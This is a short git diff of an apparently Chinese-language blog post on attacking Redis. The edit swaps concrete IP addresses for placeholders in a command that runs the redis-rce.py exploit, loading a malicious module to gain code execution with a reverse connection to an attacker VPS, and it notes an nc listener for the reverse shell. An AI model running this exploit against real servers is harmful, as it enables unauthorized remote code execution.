--- a/_posts/2021-11-05-攻击redis.md
+++ b/_posts/2021-11-05-攻击redis.md
@@ -89,7 +89,7 @@ https://github.com/0671/RedisModules-ExecuteCommand-for-Windows
 + https://github.com/Ridter/redis-rce
 发送poc
 ```
-python .\redis-rce.py -r 192.168.0.10 -L 192.168.0.8 -f .\exp_lin.so -v
+python .\redis-rce.py -r 目标 -L vps -f .\exp_lin.so -v
 ```
 > i:正向连接
 > r:反弹	需要在公网使用nc监听端口
